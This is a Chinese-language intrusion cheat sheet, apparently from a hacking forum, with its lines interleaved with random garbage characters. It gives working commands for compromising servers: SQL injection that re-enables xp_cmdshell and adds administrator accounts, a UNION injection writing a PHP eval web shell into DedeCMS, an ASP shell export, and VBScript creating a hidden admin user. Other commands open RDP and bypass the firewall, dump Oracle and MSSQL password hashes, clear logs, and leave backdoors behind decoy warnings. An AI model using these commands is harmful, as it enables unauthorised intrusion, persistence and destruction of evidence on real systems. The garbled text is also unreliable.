- o3 `3 j. P, W* _( h1.net user administrator /passwordreq:no1 t& Z2 o, ` `7 T2 f3 [
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了0 ? k C4 y0 o9 \% r: Z& C' y+ t1 k
2.比较巧妙的建克隆号的步骤
( E. |2 I/ ~7 O先建一个user的用户
5 V! h7 `& ]6 e0 c) {$ f1 P然后导出注册表。然后在计算机管理里删掉
* x3 m5 {- B J D在导入,在添加为管理员组
2 @# @6 r, q) \7 C) T3.查radmin密码 ?/ J+ L- v4 {. g% v' j$ g2 L
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg4 h8 H3 d, l2 t7 Q& V) {) N' A
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
5 P; }- e. G: L4 I% x; s$ B( ^建立一个"services.exe"的项9 w8 b9 I- w4 C$ d5 [6 d& m
再在其下面建立(字符串值)
4 N% |- l5 Q1 g键值为mu ma的全路径
1 ^; _. ~) g+ X, N& l! K2 @5 Z5.runas /user:guest cmd1 R+ d' v: u( d/ H9 b
测试用户权限!
4 C+ d( Q1 E! S9 K+ z- d \# A1 x6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
8 J. \- E* J1 o6 p0 D- `7.入侵后漏洞修补、痕迹清理,后门置放:. i2 {. O% e2 U) W" N& v7 L
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门% y; B x& }& B- [
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c1 Q! P5 } J# r' p2 n
2 C5 S [# q% O }for example
9 P: Q! v9 y$ @, G
/ A& W& q3 s3 Zdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'" n0 f% j' g* C4 J
/ O4 i: e- k0 k7 ]1 q
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
" z0 y; Q9 v+ c- j0 M5 T# U: y; {# _
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了+ _3 a6 P- f& I$ o7 H
如果要启用的话就必须把他加到高级用户模式/ a- [! M {$ X7 U8 Q
可以直接在注入点那里直接注入5 u7 u3 N$ N4 g# p+ w9 Q8 P( D* d
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--$ U) h+ E% M$ B, C3 d3 m: U
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--- e! f5 V6 ^2 V: ~- U; `% q$ w
或者
0 G0 S! g- d3 r a; a0 q" c$ Dsp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
- U3 h8 I4 G4 v来恢复cmdshell。 K; o% [" H1 b( i5 ^8 ]
7 N' C4 R7 q, l6 s3 a1 O8 z
分析器( X) `+ B& o) y6 F
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--5 a7 u( f# D L: ]" q
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
3 ?* A/ E, ] b1 J, `; s1 X1 H10.xp_cmdshell新的恢复办法
" H0 I; C' X: ~/ hxp_cmdshell新的恢复办法+ y& N9 f) Q, ]+ n# ^1 g& C1 E( z4 q B
扩展储存过程被删除以后可以有很简单的办法恢复:; S8 v. l5 J) o
删除
" o- ?7 I, P" A) Edrop procedure sp_addextendedproc
7 y2 V2 h! i0 _drop procedure sp_oacreate5 E- V2 m E" a/ m ?
exec sp_dropextendedproc 'xp_cmdshell': @$ w+ g8 ]5 W, N' N/ h
, m0 I9 G4 b+ b: K4 e
恢复4 O) I8 o% |8 F7 D
dbcc addextendedproc ("sp_oacreate","odsole70.dll")$ ]4 ?2 H' b. S
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")( b% i# H4 T7 @- q9 [9 Q
; _' {! m% v# A% q5 T1 X1 u
这样可以直接恢复,不用去管sp_addextendedproc是不是存在" u) n9 E R( N# s
" E: x9 X9 E) p" w1 R0 Q
-----------------------------
- K5 t5 p3 B* I! x' Q
8 J! d* b9 v1 |6 \% S, @删除扩展存储过过程xp_cmdshell的语句:
, ?8 H! Z( z, @4 N I. }0 y9 Oexec sp_dropextendedproc 'xp_cmdshell'
l& p" |/ `' l1 E/ g) d4 t
1 [) P3 o* O7 H M" o- B7 _, a9 i恢复cmdshell的sql语句
) K0 d2 F, H* Xexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll': A# ~6 J. l% |% V. D! ?, w
0 Y# o2 ]0 t2 x6 \5 j: e o a
2 P. u' P* Z/ d, I5 }! o# F开启cmdshell的sql语句
7 T) G1 f' Y; X- n$ o) [ `7 Q
& U0 Q4 k( d; _' m( W9 Bexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
3 h0 E: c0 p0 ^( T' l" Z, H; k
4 W; E3 l6 }; N判断存储扩展是否存在' n0 `2 e1 u. Z* y; z+ a5 B
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
! I8 d! f3 V- H8 }: G: v/ v4 {# ^返回结果为1就ok
8 Q N, Q+ t6 s, z5 ?6 Z) a5 m/ x R" y6 L/ y' n9 q
恢复xp_cmdshell0 t' x- l2 f* i
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
" L7 A; i' X$ c0 |返回结果为1就ok& F' u: _6 g& j/ ^
% i( ~' [+ B: N否则上传xplog7.0.dll5 r, V( u5 G* ~8 g+ i
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
1 ~& ?* b2 E% t8 m
U5 X) `3 B. x9 p' [7 }堵上cmdshell的sql语句4 k0 W2 R4 }7 R* g0 W9 S0 S+ z( z' f& p
sp_dropextendedproc "xp_cmdshel' N9 ?0 \6 f9 l. b3 n
-------------------------0 s/ G9 ? m% D5 J! [1 O
清除3389的登录记录用一条系统自带的命令:# ^8 C3 |0 C) }" ~3 ~! c
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
. d' R( G& g- m% B ^% b; @
, a/ R" w% b+ O' j3 t* b, T7 z1 [然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件! P* {1 m# c- P+ A
在 mysql里查看当前用户的权限
+ I' `# B5 ^# r; j# b- g! x2 kshow grants for 7 o; ~5 u& X6 }' ~2 Y' d6 S
8 D1 X ^, p# R# O以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。! e# o; S0 G7 `+ `( ^6 _
# T( m) g1 I, u4 Q: x7 R' ]/ G: f. e# v3 B# X
Create USER 'itpro'@'%' IDENTIFIED BY '123';. `! E, Z& j' J4 t5 k& c5 B
& X$ n6 d+ X- Q% Y+ U' K
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION( ^8 M$ |! K5 }9 M0 \
1 t' O) E4 [: Z% \4 `9 zMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
7 X' F% {3 W! h; z
7 ?7 ?+ e/ P: i4 i/ y+ RMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;9 d4 a0 D' q" E6 o
+ V# l9 u. z5 _% j a搞完事记得删除脚印哟。6 U+ j8 ?2 f! K
4 P$ W5 T) X. Z9 O
Drop USER 'itpro'@'%';
- ^" M7 o0 L1 P$ K( D9 ~: a! [/ j' B0 H; S
. w- ]: Z" d. m7 c: dDrop DATABASE IF EXISTS `itpro` ;
~; b$ \& ~6 Z8 }5 u
" B' C% ~$ h% @$ K6 R当前用户获取system权限) \0 V- N% d( \7 b
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
% O. |2 _* v& `( [1 Gsc start SuperCMD
2 {5 E) E5 Y# ]7 e4 d9 M- R程序代码
% z( V2 w: |/ D8 o<SCRIPT LANGUAGE="VBScript">/ r& t% W4 D' Y3 L8 R
set wsnetwork=CreateObject("WSCRIPT.NETWORK")' i: p A2 g0 a& H% e
os="WinNT://"&wsnetwork.ComputerName+ z$ @ v3 C3 m4 \/ E
Set ob=GetObject(os)
, |1 b8 p0 C* [+ N, \5 GSet oe=GetObject(os&"/Administrators,group")
: F- @$ k/ F9 `Set od=ob.Create("user","nosec")
& \( a( |0 [4 w' T5 L, Fod.SetPassword "123456abc!@#"
- N- G g9 x- h1 God.SetInfo
# D) D3 @$ I& [ i6 `Set of=GetObject(os&"/nosec",user)! i5 k' ?4 O ^ v4 K7 Y
oe.add os&"/nosec"
8 }: y; @3 v6 Z& S7 i8 u' Q9 ]0 p" a</Script>& ^, V, L, [! w1 h# I9 q1 Q& I, X
<script language=javascript>window.close();</script>4 C" F- b6 R/ {* I3 E# G
3 m1 i# \7 o' C% Z( `3 C
# f5 W# a# q7 i6 v) o1 l3 A
9 T* {' n- c0 _8 S3 Y
- V/ k; Z9 w9 t
突破验证码限制入后台拿shell
# f& F; H3 n* E# M" G# Q6 X程序代码7 }8 W0 T0 U+ }: u( B* ?7 \
REGEDIT4 0 }# G) F! H! y) `/ `5 N
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
( a6 R+ m) b7 A"BlockXBM"=dword:00000000
5 p, G+ l9 b- b! q* [' l6 R! r" K) w
保存为code.reg,导入注册表,重器IE& l( }2 n& ^+ ]7 o
就可以了
6 b2 B* Y- ^, | u, v7 Vunion写马7 d' k2 P) {( a" g
程序代码2 z4 P" P0 k$ q9 j( k
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*& r& s) y6 P% ]. h) {0 j
1 T% N& W9 c8 U. `! [应用在dedecms注射漏洞上,无后台写马
4 L% S6 Y( k/ w9 J; Ddedecms后台,无文件管理器,没有outfile权限的时候9 [. [: f' c0 D- j9 L
在插件管理-病毒扫描里
9 q1 X0 R3 _% E7 i5 ~写一句话进include/config_hand.php里
$ J6 P4 d3 l' V6 P程序代码# o+ Q8 c* e5 g
>';?><?php @eval($_POST[cmd]);?>. i2 y! T5 R6 ^% W% Q* `6 s6 M7 S2 a
* z/ F3 W( ^- |3 u# ]) K( g+ O" F8 z2 z7 g7 s4 {* X5 ]
如上格式
( Y$ |, @' v) B. f7 L
& J% x4 ]% b! t" Q5 `oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
. a* t6 z* W" x+ Z4 d程序代码
# {0 G' v' b8 D( s! W D/ s- x& }select username,password from dba_users;
8 a( G. v) b# U0 Z( l# z/ |6 E8 f) G% ?" u6 A1 G
5 _* I8 m' k( X4 f3 Y/ I$ S& t
mysql远程连接用户
- ]+ C6 f) C2 J! \$ t% }程序代码
' s: P% E% \; b
$ n+ x! w+ P3 H* z* ^( p' f( bCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';+ r* C: g+ T# y/ I
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION2 a4 R0 X* S, j1 ?, _$ A7 B
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0$ B) p4 k9 t2 y" ?: u
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;- l& ?7 `$ N5 v! a
& Q! C, ~# A0 D1 Q, H9 R1 M* K- @7 A$ A
0 k) a: j/ \' P+ l4 X+ O+ ?$ T2 e7 d# p
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
3 n) l7 p2 F o0 j: [; _8 z0 ^& I" m/ h4 s
1.查询终端端口0 s+ I8 T$ v. X+ R9 m
4 G7 O. ^+ x& g8 b4 Bxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber0 d2 q2 j+ P: ^+ `2 |. A
" }% R$ \* Q4 _% e& O( Z通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"# B2 }( f8 X" A9 m
type tsp.reg4 V$ [/ N8 D& V" b8 I0 Y y
7 I( b' _- T* y9 ]$ B
2.开启XP&2003终端服务
+ _: p0 o; p5 G+ G- o6 H I) Q( o9 m
# h8 j! T8 l9 ~9 pREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f: b1 e# N. k. L( s6 M$ W$ o# e
2 j2 Y1 q* i: V$ I
* k7 `) z% [4 v4 D8 N$ b5 U9 n' v2 Z5 qREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f# d9 M' w2 e: ^- K: H
4 l# V# {& [ M' C2 u7 U! j8 I3.更改终端端口为20008(0x4E28)
$ T4 n: ]. M5 {8 w/ z$ h H$ P8 z3 A$ F# R
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f+ F$ x$ d5 o. [' S
5 Z" k* D; I" u. r: h, c
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f) H8 ~4 | h# D
8 l/ ]0 Y0 f' G- W5 u" D& ?, Z5 H4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制2 S$ I" h5 S) P% O
9 ?7 ^& M: G' F2 s$ n, }
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
1 H9 R+ k! R3 i. V+ H4 R9 ^4 d7 \; Q- U. T
; q' Z5 ?8 j* T. q2 R$ z5.开启Win2000的终端,端口为3389(需重启)4 ] k* v% S3 Q- ]% N6 w! r b
9 G% ^" x, W( x9 ^% X! o
echo Windows Registry Editor Version 5.00 >2000.reg
1 H& ^7 Y/ k! O2 _! R8 gecho. >>2000.reg
0 [9 X) m7 ^* I4 wecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 9 G1 n* a- B7 v$ W5 e5 }
echo "Enabled"="0" >>2000.reg
7 w) S+ b, ]/ eecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
0 W6 Y% U/ V8 X) ~9 oecho "ShutdownWithoutLogon"="0" >>2000.reg 1 W; @4 Y& K% z/ P3 [# x+ q
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg 2 L: ^: c9 m, s t8 I* m4 i
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg 0 g: G4 V( U' ?; g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg - s" s% V( u6 t. q8 H* h3 q {
echo "TSEnabled"=dword:00000001 >>2000.reg
" v/ }) `, w% \3 @ Zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg ( P/ V# H7 ]' K& L& t0 \9 Z
echo "Start"=dword:00000002 >>2000.reg 1 ~6 V- n) B- E3 @) [ B+ m
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
( K4 i) Z6 R+ O0 K2 n$ l$ |" uecho "Start"=dword:00000002 >>2000.reg 9 v' d8 l" L* y- N
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg % B. G- Y A9 s2 z1 d+ ^
echo "Hotkey"="1" >>2000.reg
! J, T4 n7 ~1 w, D- ?echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
! Q) K9 _0 I0 cecho "ortNumber"=dword:00000D3D >>2000.reg
/ O. F1 ?( O2 x1 ^1 ?5 Uecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg 7 T' Y `, O- `: b: ?
echo "ortNumber"=dword:00000D3D >>2000.reg
: B* Y: d/ W' v) o: D$ O; C1 y2 n8 G
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启); ~5 Z1 D- V* {0 O" z7 d9 ^; P: j
' n# \- J& p3 l@ECHO OFF & cd/d %temp% & echo [version] > restart.inf% v1 W" K' K; ]$ c0 a6 ^. z, t
(set inf=InstallHinfSection DefaultInstall)
' C& a4 l" x, ^( R4 mecho signature=$chicago$ >> restart.inf" E/ {4 |3 @; F4 o
echo [defaultinstall] >> restart.inf: ~" S0 w! `2 y, _* }
rundll32 setupapi,%inf% 1 %temp%\restart.inf
+ X' r8 _0 ^* U( H
( V8 w, m' U8 R P0 v5 a+ [$ x- ~+ u2 S* Y* u
7.禁用TCP/IP端口筛选 (需重启)
/ o2 L1 |' Y$ u/ C4 w! [$ U5 o6 t
1 ]/ \+ Z+ w, S. Y9 Q& U7 |2 C3 |REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f+ z- o) {/ v8 `& S+ u& F, F
# J$ g) B2 u5 o! d
8.终端超出最大连接数时可用下面的命令来连接8 K' {8 F$ |) W! {# v
3 ~& t7 q( _/ G+ t N5 u* D
mstsc /v:ip:3389 /console
4 g+ x& ^: a) G: [8 U2 m
7 C0 v A% e: P; s# p+ g. t, P5 r9.调整NTFS分区权限) f1 a7 T: P% S, L
' O% Z4 N* i+ W6 W! vcacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)! \+ m) ~3 r+ Q* t- p; j
) c5 q& L; E& l; V% }cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
' f) n! @- n( b8 R" I# V. s
: }, n0 r1 A2 m0 D6 J------------------------------------------------------0 ]" N5 W. h2 D$ y' N( H+ F Z
3389.vbs
/ C6 s9 G# m1 Q/ V2 |4 \On Error Resume Next
. v% A' S( d& K8 H3 Z6 [const HKEY_LOCAL_MACHINE = &H80000002
3 Z! F0 [) q: l% K' V8 E9 ?8 K: ystrComputer = "."
# A. f4 v9 B! ?. U% ?+ fSet StdOut = WScript.StdOut
2 w5 }6 a- w$ h$ G5 VSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
9 z3 V; t0 J* j/ _6 N# \strComputer & "\root\default:StdRegProv"): [! x o& h) \
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"! w; }) s7 ?% _, p# V, j. A+ J
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
3 w" x$ P9 _- r; d! m" BstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"& \# D! y- h4 {7 Z8 D+ s" o2 N
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath' g) m! `, T+ E# X( S9 q: E
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"1 P& v9 x0 y( {- o2 l# M
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"1 s4 }* N& N9 ]% L: u- L% |2 f
strValueName = "fDenyTSConnections"0 V! h6 k, H/ z4 c( f, w
dwValue = 0
c" z, D/ v6 I5 j$ j# Coreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue) a' f7 \: d0 ` `9 ?* [
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
4 z4 z* A' M( w9 S% [1 GstrValueName = "ortNumber"; k `( F6 w* Z; [
dwValue = 33899 k: g) ?. ~$ q* \# W3 s
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue X' Q6 j8 a6 w& d- R# u& R# x: X
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"; b: H8 W! v4 T
strValueName = "ortNumber"
+ ]) y8 C" l/ k8 udwValue = 3389# m% S5 Z' i, j
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue a5 R! j0 R% I* Z. t& P/ W
Set R = CreateObject("WScript.Shell") ! f3 O; {* t8 A( P2 i
R.run("Shutdown.exe -f -r -t 0")
6 i: m5 I7 F1 u/ y& G7 x; E9 R" ^
8 w% A1 [* o& X! ]( E删除awgina.dll的注册表键值3 j* K. k2 t! o. C
程序代码3 {% i. Y( `& E# V
4 z" e0 j. \0 E# O# R# ^
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f+ c" n6 y& U/ @8 `* H- J" J
. E* |! A+ F* S" }0 X
& I1 H9 m, Z4 C, i
0 _# P& t9 l: e* Y
7 w- S1 p, E$ Y; i ?5 B
程序代码
9 S5 ]4 K+ H2 @. z; ~HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
) I# V) M' S `# C" u4 K+ Z8 X4 M( ?' @; c5 o8 C5 P5 c
设置为1,关闭LM Hash$ W8 q; }: v, ]) H
* K8 [4 w7 J7 L: b* C
数据库安全:入侵Oracle数据库常用操作命令( o5 t' `% Y$ q6 ~8 P: ]4 C- h
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。 n6 c w: A' n- m# P9 r
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
) }! ?; f+ y5 j2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
4 J, ]" a" }! v4 ]" V0 ?; @- X3、SQL>connect / as sysdba ;(as sysoper)或
+ p9 q& Z2 A$ V" \% O8 K( `9 zconnect internal/oracle AS SYSDBA ;(scott/tiger)
9 W. |' X& u. vconn sys/change_on_install as sysdba;, Z+ ] G- h( p C- h& h* ~
4、SQL>startup; 启动数据库实例
0 [4 i8 t i5 M4 Z8 ]- X5、查看当前的所有数据库: select * from v$database;
/ m+ U0 z4 ]: m. qselect name from v$database;. t* r0 Q8 U8 H8 |
6、desc v$databases; 查看数据库结构字段
: M/ e }! E9 j& x7 P" c& v* z0 S7 F% r7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:8 [! W- E1 w/ _1 ^. [ _
SQL>select * from V_$PWFILE_USERS;
5 C0 V+ p7 g9 y7 ]: K- n0 W* wShow user;查看当前数据库连接用户
+ k$ Y9 {; r3 Y5 J) j6 |8、进入test数据库:database test;0 G: }5 Q: K3 C0 j1 _
9、查看所有的数据库实例:select * from v$instance;
( M3 H8 G6 A. u! X# M如:ora9i% w* M; i1 S5 v& \: z0 I
10、查看当前库的所有数据表:
/ ], s8 H$ Q5 I: z# ^9 ?4 kSQL> select TABLE_NAME from all_tables;8 y9 L6 G7 \- s4 j. v I* W; }
select * from all_tables;
4 s5 V3 q' P8 y9 r5 ySQL> select table_name from all_tables where table_name like '%u%';
5 R/ M# c" j6 ~) F+ |% M) ^8 f, zTABLE_NAME4 `3 N9 H) `. Y: ~
------------------------------0 u, J" o+ A9 q
_default_auditing_options_
; Q) H- }& x2 G+ f11、查看表结构:desc all_tables;
; }; i8 |* u# d4 _ j12、显示CQI.T_BBS_XUSER的所有字段结构:* o6 u/ w: H& C* e! c. W
desc CQI.T_BBS_XUSER;
& [1 [* g* u3 H3 C13、获得CQI.T_BBS_XUSER表中的记录:
2 d+ Q7 @1 e9 e6 D l- U- R3 Y4 Uselect * from CQI.T_BBS_XUSER;6 w# p2 ?6 e2 C" Y* m
14、增加数据库用户:(test11/test)
$ ~" f' t1 E5 L6 u8 kcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
: d9 d, f" K) m- K v! o# C15、用户授权:7 x! s5 f- A' S1 F7 K: E
grant connect,resource,dba to test11;# ~. y- a3 s; ^3 U
grant sysdba to test11;
5 X2 E9 L) J& u6 @: acommit;& U0 F1 V% J) B. s z9 l7 J
16、更改数据库用户的密码:(将sys与system的密码改为test.)
; E4 f5 c2 k2 calter user sys indentified by test;
1 z9 V8 @( ~$ s J. Q6 walter user system indentified by test;& a. u& i, J. ]3 ^( k
- n/ |0 J4 N8 ~1 SapplicationContext-util.xml
8 X3 z5 \7 ^& JapplicationContext.xml
# k2 ?1 m& O; `* Z% dstruts-config.xml G5 v& V( t* l. \1 q1 z
web.xml& M: m0 N0 ]* t
server.xml- Z9 _. @$ W* U1 w2 Q, _. V0 R1 @
tomcat-users.xml
) m& I0 G8 Z! x, F+ mhibernate.cfg.xml1 O% X$ F, k$ \, E% J# x
database_pool_config.xml
+ t( }( g, t# ^8 `8 _1 E8 b+ y/ b( w
# y5 x6 f, v% {8 Y\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置; I7 v7 y$ v! F% V) o7 i \
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini7 U8 p3 |2 y4 G" T( S: H+ T
\WEB-INF\struts-config.xml 文件目录结构8 y' x3 Q1 N! @5 d
* J( }3 t% }9 P% B+ {/ gspring.properties 里边包含hibernate.cfg.xml的名称
( y7 V8 N2 g* o8 I2 l+ W5 R9 h3 a/ Z! W
( S9 j2 E7 m4 eC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
) R9 Q0 f1 Q+ T8 f0 G; _- }: Z* J5 J, z3 p" B% u: ?( ?) W5 r
如果都找不到 那就看看class文件吧。。
C$ U3 L7 r% _2 K# o& z6 G
2 b; |. k$ z$ f, i; Z测试1:
8 S* k8 U+ H0 t/ V+ [SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
! k, _6 c) b$ G$ `: f0 v, K8 L
/ ?. Z6 w2 g5 j& G测试2:
& f8 V. R8 h( i2 P4 W6 q7 y2 R) _$ r$ W
create table dirs(paths varchar(100),paths1 varchar(100), id int)- [. J+ `7 \; d0 N
) P* Q, a6 H4 K2 Q% k1 K
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--1 W+ K+ v/ O0 \
9 V- w; W* L- E
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1. K5 A, a9 \! n- A. W
5 z) M1 Z& b' G- ]$ j3 C
查看虚拟机中的共享文件:" @6 i: q/ D" K8 q& y- l+ l
在虚拟机中的cmd中执行
, I, I: k& {$ {5 w1 F\\.host\Shared Folders% Z5 X: L* I% \9 E0 e
0 S5 v8 v2 x& b& c2 C# }) J4 [
cmdshell下找终端的技巧' l' t& b( f/ |% K: \7 Z
找终端:
5 P* ?# `) z: ]0 N! Z第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
2 l# x1 L8 e# R8 w0 y. m 而终端所对应的服务名为:TermService ( O- A: E7 G( B8 i' m8 {+ L
第二步:用netstat -ano命令,列出所有端口对应的PID值! - _; }5 U# E1 t* B
找到PID值所对应的端口4 ?- Z! h7 ]8 o: `8 ^0 v
% ^& b7 D. R6 d查询sql server 2005中的密码hash
( E# l; {! q* h, [; g" ]/ y7 {SELECT password_hash FROM sys.sql_logins where name='sa'; s3 G3 f( a$ i5 M1 p) o& q8 a3 B8 t
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a ]9 g9 e/ t, Y* I+ f0 r
access中导出shell
2 m0 K: l7 T& @* p
9 G& j" K, `) A, `5 [中文版本操作系统中针对mysql添加用户完整代码:
7 a( s4 z* u$ }6 f2 ?7 D l# c, ?/ s; ~3 s5 j$ Z& A
use test;3 _. {& G! F. {# V! z# P& w4 b
create table a (cmd text);8 a' _. a- @' L% t" \ u
